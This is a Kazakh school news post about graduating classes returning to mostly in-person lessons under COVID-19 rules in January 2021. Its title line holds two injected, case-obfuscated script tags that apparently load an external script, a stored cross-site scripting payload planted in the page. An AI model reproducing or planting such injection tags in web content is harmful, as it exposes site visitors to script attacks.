Мектеп бітіруші сынып оқушыларының дәстүрлі форматта оқуы туралы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

12.01.2021

Коронавирустық инфекцияның таралуына жол бермеу жөніндегі ведомствоаралық комиссияның шешімі бойынша 2020-2021 оқу жылының III тоқсанынан бастап мектеп бітіруші сыныптары аралас форматта пәндердің 70%-ы дәстүрлі форматта, ал 30%-ы қашықтан оқуды бастады. Мектеп бойынша бітіруші сыныптардағы оқушылардың саны 123 оқушы, оның ішінде 9-сыныпта 85 оқушы, 11-сыныпта 38 оқушы.

Оқу процесін аралас форматта ұйымдастыру кезінде санитарлық-эпидемиологиялық нормалар сақталып, сабақтардың икемді кестесі құрылды. Сонымен қатар әлеуметтік қашықтықты сақтау үшін  әрбір сынып үшін сабақ арасындағы үзілістер әр түрлі уақытта ұйымдастырылды. Санитарлық талаптарға сәйкес мектепке кіру кезінде білім алушылар мен педагогтердің дене қызуы күнделікті өлшенеді.                                                                                                                                                                                       /public/files/2021/1/12/120121_174653_whatsapp-video-2021-01-12-at-173117.mp4

Просмотров: 284

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу